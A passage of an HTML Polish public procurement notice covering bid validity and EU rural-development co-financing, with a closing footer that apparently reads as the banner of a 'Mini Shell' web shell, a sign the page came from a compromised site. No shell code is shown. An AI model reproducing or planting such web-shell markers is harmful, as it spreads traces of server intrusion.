sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt dofinansowany w ramach działania 313, 322, 323 -Odnowa i rozwój wsi Program Rozwoju Obszarów Wiejskich 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com